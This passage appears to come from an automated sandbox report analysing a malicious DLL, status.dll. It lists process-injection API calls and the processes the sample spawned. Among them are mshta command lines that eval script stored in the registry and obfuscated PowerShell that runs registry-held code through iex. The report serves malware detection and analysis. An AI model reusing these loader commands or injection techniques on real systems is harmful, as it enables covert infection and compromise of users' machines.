Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00998572 6_2_00998572
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A5E19 6_2_009A5E19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00991FD5 6_2_00991FD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A7FC6 6_2_009A7FC6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009B3724 6_2_009B3724
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B05BD0 CreateProcessAsUserW, 1_2_03B05BD0
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_017D77BB
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D462B GetProcAddress,NtCreateSection,memset, 1_2_017D462B
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D2A0A NtMapViewOfSection, 1_2_017D2A0A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D8401 NtQueryVirtualMemory, 1_2_017D8401
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0AB8 NtProtectVirtualMemory, 1_2_00FE0AB8
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0880 NtAllocateVirtualMemory, 1_2_00FE0880
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B141EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_03B141EE
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_03B0F6C4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B03D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_03B03D90
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_03B0ECB4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0DC0B NtQueryInformationProcess, 1_2_03B0DC0B
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1EC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_03B1EC5A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_03B1945C
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B143A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_03B143A0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1DBFA NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_03B1DBFA
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B13B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_03B13B11
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0EB58 memset,NtQueryInformationProcess, 1_2_03B0EB58
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B061AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_03B061AD
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_03B0C084
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_03B0B012
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1A044 NtGetContextThread,RtlNtStatusToDosError, 1_2_03B1A044
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B116BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_03B116BA
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1D52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_03B1D52D
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_03B0C423
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D42A0A NtMapViewOfSection, 4_2_02D42A0A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D4462B GetProcAddress,NtCreateSection,memset, 4_2_02D4462B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D477BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_02D477BB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D48401 NtQueryVirtualMemory, 4_2_02D48401
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960880 NtAllocateVirtualMemory, 4_2_00960880
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960AB8 NtProtectVirtualMemory, 4_2_00960AB8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_048EECB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EDC0B NtQueryInformationProcess, 4_2_048EDC0B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 4_2_048F945C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FEC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 4_2_048FEC5A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E3D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 4_2_048E3D90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EF6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 4_2_048EF6C4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F41EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 4_2_048F41EE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EC423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_048EC423
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FD52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_048FD52D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F16BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_048F16BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EC084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_048EC084
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EB012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 4_2_048EB012
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FA044 NtGetContextThread,RtlNtStatusToDosError, 4_2_048FA044
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E61AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 4_2_048E61AD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F43A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 4_2_048F43A0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FDBFA NtQuerySystemInformation,RtlNtStatusToDosError, 4_2_048FDBFA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F3B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_048F3B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EEB58 memset,NtQueryInformationProcess, 4_2_048EEB58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA462B GetProcAddress,NtCreateSection,memset, 5_2_04AA462B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA2A0A NtMapViewOfSection, 5_2_04AA2A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_04AA77BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA8401 NtQueryVirtualMemory, 5_2_04AA8401
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0880 NtAllocateVirtualMemory, 5_2_031C0880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0AB8 NtProtectVirtualMemory, 5_2_031C0AB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05913D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 5_2_05913D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_0591ECB4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591DC0B NtQueryInformationProcess, 5_2_0591DC0B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592EC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 5_2_0592EC5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 5_2_0592945C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 5_2_0591F6C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059241EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 5_2_059241EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592D52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_0592D52D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 5_2_0591C423
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059216BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_059216BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059161AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 5_2_059161AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 5_2_0591C084
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 5_2_0591B012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592A044 NtGetContextThread,RtlNtStatusToDosError, 5_2_0592A044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059243A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 5_2_059243A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592DBFA NtQuerySystemInformation,RtlNtStatusToDosError, 5_2_0592DBFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05923B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 5_2_05923B11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591EB58 memset,NtQueryInformationProcess, 5_2_0591EB58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC462B GetProcAddress,NtCreateSection,memset, 6_2_00AC462B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC2A0A NtMapViewOfSection, 6_2_00AC2A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_00AC77BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC8401 NtQueryVirtualMemory, 6_2_00AC8401
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A41EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 6_2_009A41EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_0099ECB4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099DC0B NtQueryInformationProcess, 6_2_0099DC0B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009AEC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 6_2_009AEC5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 6_2_009A945C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00993D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 6_2_00993D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 6_2_0099F6C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 6_2_0099C084
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 6_2_0099B012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009AA044 NtGetContextThread,RtlNtStatusToDosError, 6_2_009AA044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009961AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 6_2_009961AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A43A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 6_2_009A43A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009ADBFA NtQuerySystemInformation,RtlNtStatusToDosError, 6_2_009ADBFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A3B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 6_2_009A3B11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099EB58 memset,NtQueryInformationProcess, 6_2_0099EB58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 6_2_0099C423
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009AD52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 6_2_009AD52D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A16BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 6_2_009A16BA
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: status.dll ReversingLabs: Detection: 23%
Source: status.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\status.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
